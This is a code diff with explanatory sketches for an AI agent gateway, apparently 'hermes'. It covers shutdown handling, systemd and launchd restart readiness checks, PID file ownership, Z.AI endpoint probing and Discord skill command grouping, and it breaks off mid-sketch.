# Notify all chats with active agents BEFORE draining.
# Adapters are still connected here, so messages can be sent.
await self._notify_active_sessions_of_shutdown()
timeout = self._restart_drain_timeout
active_agents, timed_out = await self._drain_active_agents(timeout)
if timed_out:
@@ -2041,6 +2119,11 @@ class GatewayRunner:
logger.error("Failed to launch detached gateway restart: %s", e)
self._finalize_shutdown_agents(active_agents)
await self.hooks.emit("gateway:shutdown", {
"restart": self._restart_requested,
"service_restart": self._restart_via_service,
"detached_restart": self._restart_detached,
})
for platform, adapter in list(self.adapters.items()):
try:
@@ -2088,12 +2171,23 @@ class GatewayRunner:
# Write a clean-shutdown marker so the next startup knows this
# wasn't a crash. suspend_recently_active() only needs to run
# after unexpected exits — graceful shutdowns already drain
# active agents, so there's no stuck-session risk.
try:
(_hermes_home / ".clean_shutdown").touch()
except Exception:
pass
# after unexpected exits. However, if the drain timed out and
# agents were force-interrupted, their sessions may be in an
# incomplete state (trailing tool response, no final assistant
# message). Skip the marker in that case so the next startup
# suspends those sessions — giving users a clean slate instead
# of resuming a half-finished tool loop.
if not timed_out:
try:
(_hermes_home / ".clean_shutdown").touch()
except Exception:
pass
else:
logger.info(
"Skipping .clean_shutdown marker — drain timed out with "
"interrupted agents; next startup will suspend recently "
"active sessions."
)
if self._restart_requested and self._restart_via_service:
self._exit_code = GATEWAY_SERVICE_RESTART_EXIT_CODE
@@ -9187,8 +9281,41 @@ async def start_gateway(config: Optional[GatewayConfig] = None, replace: bool =
runner = GatewayRunner(config)
# Track whether a signal initiated the shutdown (vs. internal request).
# When an unexpected SIGTERM kills the gateway, we exit non-zero so
# systemd's Restart=on-failure revives the process. systemctl stop
# is safe: systemd tracks stop-requested state independently of exit
# code, so Restart= never fires for a deliberate stop.
_signal_initiated_shutdown = False
# Set up signal handlers
def shutdown_signal_handler():
nonlocal _signal_initiated_shutdown
_signal_initiated_shutdown = True
logger.info("Received SIGTERM/SIGINT — initiating shutdown")
# Diagnostic: log all hermes-related processes so we can identify
# what triggered the signal (hermes update, hermes gateway restart,
# a stale detached subprocess, etc.).
try:
import subprocess as _sp
_ps = _sp.run(
["ps", "aux"],
capture_output=True, text=True, timeout=3,
)
_hermes_procs = [
line for line in _ps.stdout.splitlines()
if ("hermes" in line.lower() or "gateway" in line.lower())
and str(os.getpid()) not in line.split()[1:2] # exclude self
]
if _hermes_procs:
logger.warning(
"Shutdown diagnostic — other hermes processes running:\n %s",
"\n ".join(_hermes_procs),
)
else:
logger.info("Shutdown diagnostic — no other hermes processes found")
except Exception:
pass
asyncio.create_task(runner.stop())
def restart_signal_handler():
@@ -9258,6 +9385,21 @@ async def start_gateway(config: Optional[GatewayConfig] = None, replace: bool =
if runner.exit_code is not None:
raise SystemExit(runner.exit_code)
# When a signal (SIGTERM/SIGINT) caused the shutdown and it wasn't a
# planned restart (/restart, /update, SIGUSR1), exit non-zero so
# systemd's Restart=on-failure revives the process. This covers:
# - hermes update killing the gateway mid-work
# - External kill commands
# - WSL2/container runtime sending unexpected signals
# systemctl stop is safe: systemd tracks "stop requested" state
# independently of exit code, so Restart= never fires for it.
if _signal_initiated_shutdown and not runner._restart_requested:
logger.info(
"Exiting with code 1 (signal-initiated shutdown without restart "
"request) so systemd Restart=on-failure can revive the gateway."
)
return False # → sys.exit(1) in the caller
return True
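`_notify_active_sessions_of_shutdown` relies on the session-key layout `agent:main:{platform}:{chat_type}:{chat_id}[:{extra}...]`. It sends at most one notice per `(platform, chat_id)` and treats the sixth field, when present, as a thread id. The sketch below isolates that parsing and deduplication as a pure function so it can be checked without adapters. `plan_shutdown_notices` is a hypothetical name, and the sample keys (including the `group` and `dm` chat types) are made up.

```python
from typing import Optional


def plan_shutdown_notices(session_keys: list[str]) -> list[tuple[str, str, Optional[str]]]:
    """Return one (platform, chat_id, thread_id) target per chat, in first-seen order."""
    targets: list[tuple[str, str, Optional[str]]] = []
    seen: set[tuple[str, str]] = set()
    for key in session_keys:
        parts = key.split(":")
        if len(parts) < 5:
            continue  # not an agent:main:... key, nothing to notify
        platform, chat_id = parts[2], parts[4]
        if (platform, chat_id) in seen:
            continue  # several sessions in one chat share a single notice
        thread_id = parts[5] if len(parts) > 5 else None
        seen.add((platform, chat_id))
        targets.append((platform, chat_id, thread_id))
    return targets


keys = [
    "agent:main:telegram:group:-100123:42",
    "agent:main:telegram:group:-100123:77",
    "agent:main:discord:dm:555",
    "malformed",
]
print(plan_shutdown_notices(keys))
# [('telegram', '-100123', '42'), ('discord', '555', None)]
```

One difference from the method above: the real loop adds a chat to `notified` only after `adapter.send` succeeds. If the send fails, a later session in the same chat gets another attempt. This pure version marks a chat as handled as soon as it is planned.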
+153 -3
@@ -27,6 +27,7 @@ _RUNTIME_STATUS_FILE = "gateway_state.json"
_LOCKS_DIRNAME = "gateway-locks"
_IS_WINDOWS = sys.platform == "win32"
_UNSET = object()
_VALID_STARTUP_CHECK_STATES = {"pending", "ready", "failed"}
def _get_pid_path() -> Path:
@@ -162,11 +163,39 @@ def _build_runtime_status_record() -> dict[str, Any]:
"restart_requested": False,
"active_agents": 0,
"platforms": {},
"startup_checks": {},
"updated_at": _utc_now_iso(),
})
return payload
def _normalize_startup_check_entries(
startup_checks: Optional[dict[str, Any]],
) -> dict[str, dict[str, Any]]:
"""Normalize persisted startup readiness entries."""
if not isinstance(startup_checks, dict):
return {}
now = _utc_now_iso()
normalized: dict[str, dict[str, Any]] = {}
for raw_id, raw_payload in startup_checks.items():
check_id = str(raw_id).strip()
if not check_id:
continue
payload = raw_payload if isinstance(raw_payload, dict) else {}
state = str(payload.get("state", "pending")).strip().lower()
if state not in _VALID_STARTUP_CHECK_STATES:
state = "pending"
normalized[check_id] = {
"state": state,
"required": bool(payload.get("required", True)),
"source": payload.get("source"),
"detail": payload.get("detail"),
"updated_at": payload.get("updated_at") or now,
}
return normalized
def _read_json_file(path: Path) -> Optional[dict[str, Any]]:
if not path.exists():
return None
@@ -223,6 +252,7 @@ def write_runtime_status(
exit_reason: Any = _UNSET,
restart_requested: Any = _UNSET,
active_agents: Any = _UNSET,
startup_checks: Any = _UNSET,
platform: Any = _UNSET,
platform_state: Any = _UNSET,
error_code: Any = _UNSET,
@@ -245,6 +275,8 @@ def write_runtime_status(
payload["restart_requested"] = bool(restart_requested)
if active_agents is not _UNSET:
payload["active_agents"] = max(0, int(active_agents))
if startup_checks is not _UNSET:
payload["startup_checks"] = _normalize_startup_check_entries(startup_checks)
if platform is not _UNSET:
platform_payload = payload["platforms"].get(platform, {})
@@ -262,13 +294,131 @@ def write_runtime_status(
def read_runtime_status() -> Optional[dict[str, Any]]:
"""Read the persisted gateway runtime health/status information."""
return _read_json_file(_get_runtime_status_path())
payload = _read_json_file(_get_runtime_status_path())
if payload is None:
return None
payload.setdefault("platforms", {})
payload["startup_checks"] = _normalize_startup_check_entries(payload.get("startup_checks"))
return payload
def reset_startup_checks(checks: Optional[list[dict[str, Any]]] = None) -> dict[str, dict[str, Any]]:
"""Replace persisted startup readiness checks for the current run."""
normalized: dict[str, dict[str, Any]] = {}
now = _utc_now_iso()
for hook in checks or []:
if not isinstance(hook, dict):
continue
readiness = hook.get("startup_readiness")
if not isinstance(readiness, dict):
continue
check_id = str(readiness.get("id", "")).strip()
if not check_id:
continue
normalized[check_id] = {
"state": "pending",
"required": bool(readiness.get("required", True)),
"source": hook.get("name"),
"detail": None,
"updated_at": now,
}
write_runtime_status(startup_checks=normalized)
return normalized
def update_startup_check(
check_id: str,
state: str,
*,
detail: Any = _UNSET,
required: Any = _UNSET,
source: Any = _UNSET,
) -> dict[str, Any]:
"""Update a single startup readiness check in the runtime status file."""
normalized_id = str(check_id).strip()
if not normalized_id:
raise ValueError("startup readiness check id is required")
normalized_state = str(state).strip().lower()
if normalized_state not in _VALID_STARTUP_CHECK_STATES:
raise ValueError(f"invalid startup readiness state: {state}")
path = _get_runtime_status_path()
payload = _read_json_file(path) or _build_runtime_status_record()
checks = _normalize_startup_check_entries(payload.get("startup_checks"))
existing = checks.get(normalized_id, {})
now = _utc_now_iso()
checks[normalized_id] = {
"state": normalized_state,
"required": bool(existing.get("required", True) if required is _UNSET else required),
"source": existing.get("source") if source is _UNSET else source,
"detail": existing.get("detail") if detail is _UNSET else detail,
"updated_at": now,
}
payload["startup_checks"] = checks
payload.setdefault("platforms", {})
payload.setdefault("kind", _GATEWAY_KIND)
payload["pid"] = os.getpid()
payload["start_time"] = _get_process_start_time(os.getpid())
payload["updated_at"] = now
_write_json_file(path, payload)
return checks[normalized_id]
def mark_startup_check_pending(
check_id: str,
*,
detail: Any = _UNSET,
required: Any = _UNSET,
source: Any = _UNSET,
) -> dict[str, Any]:
return update_startup_check(check_id, "pending", detail=detail, required=required, source=source)
def mark_startup_check_ready(
check_id: str,
*,
detail: Any = _UNSET,
required: Any = _UNSET,
source: Any = _UNSET,
) -> dict[str, Any]:
return update_startup_check(check_id, "ready", detail=detail, required=required, source=source)
def mark_startup_check_failed(
check_id: str,
*,
detail: Any = _UNSET,
required: Any = _UNSET,
source: Any = _UNSET,
) -> dict[str, Any]:
return update_startup_check(check_id, "failed", detail=detail, required=required, source=source)
def remove_pid_file() -> None:
"""Remove the gateway PID file if it exists."""
"""Remove the gateway PID file, but only if it belongs to this process.
During --replace handoffs, the old process's atexit handler can fire AFTER
the new process has written its own PID file. Blindly removing the file
would delete the new process's record, leaving the gateway running with no
PID file (invisible to ``get_running_pid()``).
"""
try:
_get_pid_path().unlink(missing_ok=True)
path = _get_pid_path()
record = _read_json_file(path)
if record is not None:
try:
file_pid = int(record["pid"])
except (KeyError, TypeError, ValueError):
file_pid = None
if file_pid is not None and file_pid != os.getpid():
# PID file belongs to a different process — leave it alone.
return
path.unlink(missing_ok=True)
except Exception:
pass
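The ownership check in the new `remove_pid_file` can be exercised in isolation. The sketch below assumes, as `remove_pid_file` does, that the PID file is JSON with a top-level `pid` field. An unreadable or PID-less record is treated as removable, matching the fallback above. The function name `remove_pid_file_if_owned`, its explicit `path`/`my_pid` parameters, and the `gateway.pid` filename are hypothetical; they exist so the behavior can be tested against a temporary file.

```python
import json
import os
import tempfile
from pathlib import Path
from typing import Optional


def remove_pid_file_if_owned(path: Path, my_pid: Optional[int] = None) -> bool:
    """Delete `path` unless it records a different PID. Returns True if removed."""
    my_pid = os.getpid() if my_pid is None else my_pid
    try:
        record = json.loads(path.read_text())
    except FileNotFoundError:
        return False  # nothing to remove
    except (OSError, ValueError):
        record = None  # unreadable or corrupt: no owner can be established
    if record is not None:
        try:
            file_pid = int(record["pid"])
        except (KeyError, TypeError, ValueError):
            file_pid = None
        if file_pid is not None and file_pid != my_pid:
            return False  # e.g. a --replace successor already wrote its own PID
    path.unlink(missing_ok=True)
    return True


with tempfile.TemporaryDirectory() as tmp:
    pid_file = Path(tmp) / "gateway.pid"
    pid_file.write_text(json.dumps({"pid": 99999}))
    print(remove_pid_file_if_owned(pid_file, my_pid=12345))  # False
    pid_file.write_text(json.dumps({"pid": 12345}))
    print(remove_pid_file_if_owned(pid_file, my_pid=12345))  # True
    print(pid_file.exists())  # False
```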
+38 -33
@@ -383,13 +383,16 @@ def _resolve_api_key_provider_secret(
# Z.AI has separate billing for general vs coding plans, and global vs China
# endpoints. A key that works on one may return "Insufficient balance" on
# another. We probe at setup time and store the working endpoint.
# Each entry lists candidate models to try in order — newer coding plan accounts
# may only have access to recent models (glm-5.1, glm-5v-turbo) while older
# ones still use glm-4.7.
ZAI_ENDPOINTS = [
# (id, base_url, default_model, label)
("global", "https://api.z.ai/api/paas/v4", "glm-5", "Global"),
("cn", "https://open.bigmodel.cn/api/paas/v4", "glm-5", "China"),
("coding-global", "https://api.z.ai/api/coding/paas/v4", "glm-4.7", "Global (Coding Plan)"),
("coding-cn", "https://open.bigmodel.cn/api/coding/paas/v4", "glm-4.7", "China (Coding Plan)"),
# (id, base_url, probe_models, label)
("global", "https://api.z.ai/api/paas/v4", ["glm-5"], "Global"),
("cn", "https://open.bigmodel.cn/api/paas/v4", ["glm-5"], "China"),
("coding-global", "https://api.z.ai/api/coding/paas/v4", ["glm-5.1", "glm-5v-turbo", "glm-4.7"], "Global (Coding Plan)"),
("coding-cn", "https://open.bigmodel.cn/api/coding/paas/v4", ["glm-5.1", "glm-5v-turbo", "glm-4.7"], "China (Coding Plan)"),
]
@@ -397,35 +400,37 @@ def detect_zai_endpoint(api_key: str, timeout: float = 8.0) -> Optional[Dict[str
"""Probe z.ai endpoints to find one that accepts this API key.
Returns {"id": ..., "base_url": ..., "model": ..., "label": ...} for the
first working endpoint, or None if all fail.
first working endpoint, or None if all fail. For endpoints with multiple
candidate models, tries each in order and returns the first that succeeds.
"""
for ep_id, base_url, model, label in ZAI_ENDPOINTS:
try:
resp = httpx.post(
f"{base_url}/chat/completions",
headers={
"Authorization": f"Bearer {api_key}",
"Content-Type": "application/json",
},
json={
"model": model,
"stream": False,
"max_tokens": 1,
"messages": [{"role": "user", "content": "ping"}],
},
timeout=timeout,
)
if resp.status_code == 200:
logger.debug("Z.AI endpoint probe: %s (%s) OK", ep_id, base_url)
return {
"id": ep_id,
"base_url": base_url,
"model": model,
"label": label,
}
logger.debug("Z.AI endpoint probe: %s returned %s", ep_id, resp.status_code)
except Exception as exc:
logger.debug("Z.AI endpoint probe: %s failed: %s", ep_id, exc)
for ep_id, base_url, probe_models, label in ZAI_ENDPOINTS:
for model in probe_models:
try:
resp = httpx.post(
f"{base_url}/chat/completions",
headers={
"Authorization": f"Bearer {api_key}",
"Content-Type": "application/json",
},
json={
"model": model,
"stream": False,
"max_tokens": 1,
"messages": [{"role": "user", "content": "ping"}],
},
timeout=timeout,
)
if resp.status_code == 200:
logger.debug("Z.AI endpoint probe: %s (%s) model=%s OK", ep_id, base_url, model)
return {
"id": ep_id,
"base_url": base_url,
"model": model,
"label": label,
}
logger.debug("Z.AI endpoint probe: %s model=%s returned %s", ep_id, model, resp.status_code)
except Exception as exc:
logger.debug("Z.AI endpoint probe: %s model=%s failed: %s", ep_id, model, exc)
return None
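With `probe_models` now a list, the probe tries every candidate model on an endpoint before moving on to the next endpoint, so a Coding Plan key that only serves `glm-4.7` is still detected. Below is a minimal sketch of that ordering. It assumes a hypothetical `probe(base_url, model)` callable in place of the real `httpx.post` request so that it runs offline.

```python
from typing import Callable, Optional

# (id, base_url, probe_models, label), the same shape as the new ZAI_ENDPOINTS rows
Endpoint = tuple[str, str, list[str], str]


def first_working_endpoint(
    endpoints: list[Endpoint],
    probe: Callable[[str, str], bool],  # hypothetical stand-in for the HTTP probe
) -> Optional[dict]:
    """Return the first (endpoint, model) pair whose probe succeeds, else None."""
    for ep_id, base_url, probe_models, label in endpoints:
        for model in probe_models:  # try every candidate model on this endpoint
            try:
                ok = probe(base_url, model)
            except Exception:
                ok = False  # network errors count as a failed probe
            if ok:
                return {"id": ep_id, "base_url": base_url, "model": model, "label": label}
    return None


if __name__ == "__main__":
    endpoints = [
        ("global", "https://api.z.ai/api/paas/v4", ["glm-5"], "Global"),
        ("coding-global", "https://api.z.ai/api/coding/paas/v4",
         ["glm-5.1", "glm-5v-turbo", "glm-4.7"], "Global (Coding Plan)"),
    ]

    # Simulate a Coding Plan key that only accepts glm-4.7.
    def fake_probe(base_url: str, model: str) -> bool:
        return "coding" in base_url and model == "glm-4.7"

    print(first_working_endpoint(endpoints, fake_probe)["model"])  # glm-4.7
```

Injecting the probe keeps the ordering logic testable without network access. The real function additionally logs each attempt at debug level.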
+3 -3
@@ -75,12 +75,12 @@ def prompt_for_secret(cli, var_name: str, prompt: str, metadata=None) -> dict:
if not hasattr(cli, "_secret_deadline"):
cli._secret_deadline = 0
try:
value = getpass.getpass(f"{prompt} (hidden, Enter to skip): ")
value = getpass.getpass(f"{prompt} (hidden, ESC or empty Enter to skip): ")
except (EOFError, KeyboardInterrupt):
value = ""
if not value:
cprint(f"\n{_DIM} ⏭ Secret entry cancelled{_RST}")
cprint(f"\n{_DIM} ⏭ Secret entry skipped{_RST}")
return {
"success": True,
"reason": "cancelled",
@@ -133,7 +133,7 @@ def prompt_for_secret(cli, var_name: str, prompt: str, metadata=None) -> dict:
cli._app.invalidate()
if not value:
cprint(f"\n{_DIM} ⏭ Secret entry cancelled{_RST}")
cprint(f"\n{_DIM} ⏭ Secret entry skipped{_RST}")
return {
"success": True,
"reason": "cancelled",
+110
@@ -582,6 +582,116 @@ def discord_skill_commands(
)
def discord_skill_commands_by_category(
reserved_names: set[str],
) -> tuple[dict[str, list[tuple[str, str, str]]], list[tuple[str, str, str]], int]:
"""Return skill entries organized by category for Discord ``/skill`` subcommand groups.
Skills whose directory is nested at least 2 levels under ``SKILLS_DIR``
(e.g. ``creative/ascii-art/SKILL.md``) are grouped by their top-level
category. Root-level skills (e.g. ``dogfood/SKILL.md``) are returned as
*uncategorized*; the caller should register them as direct subcommands
of the ``/skill`` group.
The same filtering as :func:`discord_skill_commands` is applied: hub
skills excluded, per-platform disabled excluded, names clamped.
Returns:
``(categories, uncategorized, hidden_count)``
- *categories*: ``{category_name: [(name, description, cmd_key), ...]}``
- *uncategorized*: ``[(name, description, cmd_key), ...]``
- *hidden_count*: skills dropped due to Discord group limits
(25 subcommand groups, 25 subcommands per group)
"""
from pathlib import Path as _P
_platform_disabled: set[str] = set()
try:
from agent.skill_utils import get_disabled_skill_names
_platform_disabled = get_disabled_skill_names(platform="discord")
except Exception:
pass
# Collect raw skill data --------------------------------------------------
categories: dict[str, list[tuple[str, str, str]]] = {}
uncategorized: list[tuple[str, str, str]] = []
_names_used: set[str] = set(reserved_names)
hidden = 0
try:
from agent.skill_commands import get_skill_commands
from tools.skills_tool import SKILLS_DIR
_skills_dir = SKILLS_DIR.resolve()
_hub_dir = (SKILLS_DIR / ".hub").resolve()
skill_cmds = get_skill_commands()
for cmd_key in sorted(skill_cmds):
info = skill_cmds[cmd_key]
skill_path = info.get("skill_md_path", "")
if not skill_path:
continue
sp = _P(skill_path).resolve()
# Skip skills outside SKILLS_DIR or from the hub
if not str(sp).startswith(str(_skills_dir)):
continue
if str(sp).startswith(str(_hub_dir)):
continue
skill_name = info.get("name", "")
if skill_name in _platform_disabled:
continue
raw_name = cmd_key.lstrip("/")
# Clamp to 32 chars (Discord limit)
discord_name = raw_name[:32]
if discord_name in _names_used:
continue
_names_used.add(discord_name)
desc = info.get("description", "")
if len(desc) > 100:
desc = desc[:97] + "..."
# Determine category from the relative path within SKILLS_DIR.
# e.g. creative/ascii-art/SKILL.md → parts = ("creative", "ascii-art")
try:
rel = sp.parent.relative_to(_skills_dir)
except ValueError:
continue
parts = rel.parts
if len(parts) >= 2:
cat = parts[0]
categories.setdefault(cat, []).append((discord_name, desc, cmd_key))
else:
uncategorized.append((discord_name, desc, cmd_key))
except Exception:
pass
# Enforce Discord limits: 25 subcommand groups, 25 subcommands each ------
_MAX_GROUPS = 25
_MAX_PER_GROUP = 25
trimmed_categories: dict[str, list[tuple[str, str, str]]] = {}
group_count = 0
for cat in sorted(categories):
if group_count >= _MAX_GROUPS:
hidden += len(categories[cat])
continue
entries = categories[cat][:_MAX_PER_GROUP]
hidden += max(0, len(categories[cat]) - _MAX_PER_GROUP)
trimmed_categories[cat] = entries
group_count += 1
# Uncategorized skills also count against the 25 top-level limit
remaining_slots = _MAX_GROUPS - group_count
if len(uncategorized) > remaining_slots:
hidden += len(uncategorized) - remaining_slots
uncategorized = uncategorized[:remaining_slots]
return trimmed_categories, uncategorized, hidden
def slack_subcommand_map() -> dict[str, str]:
"""Return subcommand -> /command mapping for Slack /hermes handler.
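`discord_skill_commands_by_category` keys each skill on the first component of its directory path relative to `SKILLS_DIR`, then applies Discord's 25 × 25 limits. The sketch below is a simplified, standalone version of those two steps. The helper `group_skills` and its `rel_dirs` input are hypothetical, and the sketch leaves out hub filtering, per-platform filtering, and name clamping.

```python
from pathlib import PurePosixPath

MAX_GROUPS = 25     # Discord: top-level options (groups + direct subcommands)
MAX_PER_GROUP = 25  # Discord: subcommands per group


def group_skills(rel_dirs: dict[str, str]):
    """Group skills by top-level category and enforce Discord's limits.

    rel_dirs maps skill name -> directory relative to the skills root,
    e.g. {"ascii-art": "creative/ascii-art", "dogfood": "dogfood"}.
    Returns (categories, uncategorized, hidden_count).
    """
    categories: dict[str, list[str]] = {}
    uncategorized: list[str] = []
    for name in sorted(rel_dirs):
        parts = PurePosixPath(rel_dirs[name]).parts
        if len(parts) >= 2:  # nested: category is the top-level directory
            categories.setdefault(parts[0], []).append(name)
        else:                # root-level skill: direct /skill subcommand
            uncategorized.append(name)

    hidden = 0
    trimmed: dict[str, list[str]] = {}
    for cat in sorted(categories):
        if len(trimmed) >= MAX_GROUPS:
            hidden += len(categories[cat])  # no room for this whole group
            continue
        trimmed[cat] = categories[cat][:MAX_PER_GROUP]
        hidden += max(0, len(categories[cat]) - MAX_PER_GROUP)

    # Direct subcommands share the top-level slots left over by the groups.
    remaining = MAX_GROUPS - len(trimmed)
    hidden += max(0, len(uncategorized) - remaining)
    return trimmed, uncategorized[:remaining], hidden
```

For example, `mlops/training/axolotl` lands in the `mlops` group, matching the deep-nesting case described in the commit message.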
+125 -2
@@ -10,6 +10,7 @@ import shutil
import signal
import subprocess
import sys
import time
from pathlib import Path
PROJECT_ROOT = Path(__file__).parent.parent.resolve()
@@ -37,6 +38,10 @@ from hermes_cli.setup import (
from hermes_cli.colors import Colors, color
_SERVICE_READINESS_TIMEOUT = 30.0
_SERVICE_READINESS_POLL_INTERVAL = 0.2
# =============================================================================
# Process Management (for manual gateway runs)
# =============================================================================
@@ -1100,12 +1105,123 @@ def systemd_uninstall(system: bool = False):
print(f"{_service_scope_label(system).capitalize()} service uninstalled")
def _describe_startup_check(check_id: str, check: dict) -> str:
source = check.get("source")
detail = check.get("detail")
label = f"{check_id} ({source})" if source and source != check_id else check_id
return f"{label}: {detail}" if detail else label
def _classify_startup_checks(state: dict | None) -> tuple[list[str], list[str], list[str]]:
checks = (state or {}).get("startup_checks") or {}
pending_required: list[str] = []
failed_required: list[str] = []
optional_warnings: list[str] = []
if not isinstance(checks, dict):
return pending_required, failed_required, optional_warnings
for check_id, raw_check in checks.items():
check = raw_check if isinstance(raw_check, dict) else {}
label = _describe_startup_check(str(check_id), check)
check_state = str(check.get("state", "pending")).strip().lower()
required = bool(check.get("required", True))
if check_state == "ready":
continue
if required:
if check_state == "failed":
failed_required.append(label)
else:
pending_required.append(label)
else:
prefix = "failed" if check_state == "failed" else "pending"
optional_warnings.append(f"{prefix}: {label}")
return pending_required, failed_required, optional_warnings
def _wait_for_service_readiness(
*,
action: str,
previous_pid: int | None = None,
timeout: float = _SERVICE_READINESS_TIMEOUT,
poll_interval: float = _SERVICE_READINESS_POLL_INTERVAL,
) -> list[str]:
from gateway.status import get_running_pid, read_runtime_status
deadline = time.monotonic() + timeout
last_pending: list[str] = []
while time.monotonic() < deadline:
live_pid = get_running_pid()
if live_pid is None or (previous_pid is not None and live_pid == previous_pid):
time.sleep(poll_interval)
continue
runtime = read_runtime_status() or {}
try:
runtime_pid = int(runtime.get("pid"))
except (TypeError, ValueError):
runtime_pid = None
if runtime_pid != live_pid:
time.sleep(poll_interval)
continue
gateway_state = runtime.get("gateway_state")
pending_required, failed_required, optional_warnings = _classify_startup_checks(runtime)
last_pending = pending_required
if gateway_state == "startup_failed":
reason = runtime.get("exit_reason") or f"gateway {action} failed during startup"
raise RuntimeError(reason)
if failed_required:
raise RuntimeError(
"required startup checks failed: " + "; ".join(failed_required)
)
if gateway_state == "running" and not pending_required:
return optional_warnings
time.sleep(poll_interval)
if last_pending:
raise RuntimeError(
"timed out waiting for required startup checks: " + "; ".join(last_pending)
)
if previous_pid is not None:
raise RuntimeError(
f"timed out waiting for gateway {action}; previous process is still active or no new runtime became ready"
)
raise RuntimeError(f"timed out waiting for gateway {action} readiness")
def _await_service_ready_or_exit(
*,
action: str,
previous_pid: int | None = None,
timeout: float = _SERVICE_READINESS_TIMEOUT,
) -> None:
try:
optional_warnings = _wait_for_service_readiness(
action=action,
previous_pid=previous_pid,
timeout=timeout,
)
except RuntimeError as exc:
print_error(f" Gateway {action} did not become ready: {exc}")
raise SystemExit(1) from exc
for warning in optional_warnings:
print_warning(f" Optional startup check {warning}")
def systemd_start(system: bool = False):
system = _select_systemd_scope(system)
if system:
_require_root_for_system_service("start")
refresh_systemd_unit_if_needed(system=system)
_run_systemctl(["start", get_service_name()], system=system, check=True, timeout=30)
_await_service_ready_or_exit(action="start")
print(f"{_service_scope_label(system).capitalize()} service started")
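Each iteration of `_wait_for_service_readiness` makes one decision from the live PID and the runtime status. The sketch below expresses that decision as a pure function, which makes the precedence easy to test. The name `readiness_verdict` and its string results are hypothetical. The real loop raises `RuntimeError` instead of returning `"failed: ..."`, and it also enforces the timeout.

```python
from typing import Optional


def readiness_verdict(runtime: dict, live_pid: Optional[int],
                      previous_pid: Optional[int] = None) -> str:
    """Classify one poll as "wait", "ready", or "failed: <reason>"."""
    # No gateway yet, or the pre-restart process is still the live one.
    if live_pid is None or (previous_pid is not None and live_pid == previous_pid):
        return "wait"
    try:
        runtime_pid = int(runtime.get("pid"))
    except (TypeError, ValueError):
        runtime_pid = None
    if runtime_pid != live_pid:
        return "wait"  # status file still describes a different process
    if runtime.get("gateway_state") == "startup_failed":
        return "failed: " + (runtime.get("exit_reason") or "startup failed")
    checks = runtime.get("startup_checks") or {}
    if not isinstance(checks, dict):
        checks = {}
    pending = []
    for check_id, check in checks.items():
        check = check if isinstance(check, dict) else {}
        state = str(check.get("state", "pending")).strip().lower()
        if state == "ready" or not check.get("required", True):
            continue  # optional checks only ever produce warnings
        if state == "failed":
            return f"failed: {check_id}"
        pending.append(check_id)
    if runtime.get("gateway_state") == "running" and not pending:
        return "ready"
    return "wait"
```

The order matters. A `startup_failed` state or a failed required check ends the wait immediately. Pending required checks keep it polling even when `gateway_state` is already `"running"`.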
@@ -1128,9 +1244,11 @@ def systemd_restart(system: bool = False):
pid = get_running_pid()
if pid is not None and _request_gateway_self_restart(pid):
print(f"{_service_scope_label(system).capitalize()} service restart requested")
_await_service_ready_or_exit(action="restart", previous_pid=pid)
print(f"{_service_scope_label(system).capitalize()} service restarted")
return
_run_systemctl(["reload-or-restart", get_service_name()], system=system, check=True, timeout=90)
_await_service_ready_or_exit(action="restart", previous_pid=pid)
print(f"{_service_scope_label(system).capitalize()} service restarted")
@@ -1389,6 +1507,7 @@ def launchd_start():
plist_path.write_text(generate_launchd_plist(), encoding="utf-8")
subprocess.run(["launchctl", "bootstrap", _launchd_domain(), str(plist_path)], check=True, timeout=30)
subprocess.run(["launchctl", "kickstart", f"{_launchd_domain()}/{label}"], check=True, timeout=30)
_await_service_ready_or_exit(action="start")
print("✓ Service started")
return
@@ -1401,6 +1520,7 @@ def launchd_start():
print("↻ launchd job was unloaded; reloading service definition")
subprocess.run(["launchctl", "bootstrap", _launchd_domain(), str(plist_path)], check=True, timeout=30)
subprocess.run(["launchctl", "kickstart", f"{_launchd_domain()}/{label}"], check=True, timeout=30)
_await_service_ready_or_exit(action="start")
print("✓ Service started")
def launchd_stop():
@@ -1471,7 +1591,8 @@ def launchd_restart():
try:
pid = get_running_pid()
if pid is not None and _request_gateway_self_restart(pid):
print("✓ Service restart requested")
_await_service_ready_or_exit(action="restart", previous_pid=pid)
print("✓ Service restarted")
return
if pid is not None:
try:
@@ -1483,6 +1604,7 @@ def launchd_restart():
if not exited:
print(f"⚠ Gateway drain timed out after {drain_timeout:.0f}s — forcing launchd restart")
subprocess.run(["launchctl", "kickstart", "-k", target], check=True, timeout=90)
_await_service_ready_or_exit(action="restart", previous_pid=pid)
print("✓ Service restarted")
except subprocess.CalledProcessError as e:
if e.returncode not in (3, 113):
@@ -1492,6 +1614,7 @@ def launchd_restart():
plist_path = get_launchd_plist_path()
subprocess.run(["launchctl", "bootstrap", _launchd_domain(), str(plist_path)], check=True, timeout=30)
subprocess.run(["launchctl", "kickstart", target], check=True, timeout=30)
_await_service_ready_or_exit(action="restart", previous_pid=pid)
print("✓ Service restarted")
def launchd_status(deep: bool = False):
+34 -1
@@ -4036,7 +4036,40 @@ def cmd_update(args):
capture_output=True, text=True, timeout=15,
)
if restart.returncode == 0:
restarted_services.append(svc_name)
# Verify the service actually survived the
# restart. systemctl restart returns 0 even
# if the new process crashes immediately.
import time as _time
_time.sleep(3)
verify = subprocess.run(
scope_cmd + ["is-active", svc_name],
capture_output=True, text=True, timeout=5,
)
if verify.stdout.strip() == "active":
restarted_services.append(svc_name)
else:
# Retry once — transient startup failures
# (stale module cache, import race) often
# resolve on the second attempt.
print(f"{svc_name} died after restart, retrying...")
retry = subprocess.run(
scope_cmd + ["restart", svc_name],
capture_output=True, text=True, timeout=15,
)
_time.sleep(3)
verify2 = subprocess.run(
scope_cmd + ["is-active", svc_name],
capture_output=True, text=True, timeout=5,
)
if verify2.stdout.strip() == "active":
restarted_services.append(svc_name)
print(f"{svc_name} recovered on retry")
else:
print(
f"{svc_name} failed to stay running after restart.\n"
f" Check logs: journalctl {'--user ' if scope == 'user' else ''}-u {svc_name} --since '2 min ago'\n"
f" Restart manually: systemctl {'--user ' if scope == 'user' else ''}restart {svc_name}"
)
else:
print(f" ⚠ Failed to restart {svc_name}: {restart.stderr.strip()}")
except (FileNotFoundError, subprocess.TimeoutExpired):
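The `cmd_update` change follows a restart, settle, verify, retry-once pattern, because `systemctl restart` can exit 0 even when the new process dies right away. Below is a generalized sketch of that pattern. It assumes hypothetical `restart()` and `is_active()` callables that stand in for the `systemctl restart` and `systemctl is-active` subprocess calls.

```python
import time
from typing import Callable


def restart_and_verify(restart: Callable[[], bool], is_active: Callable[[], bool],
                       settle_seconds: float = 3.0, attempts: int = 2) -> bool:
    """Restart, wait for the process to settle, then confirm it is still active.

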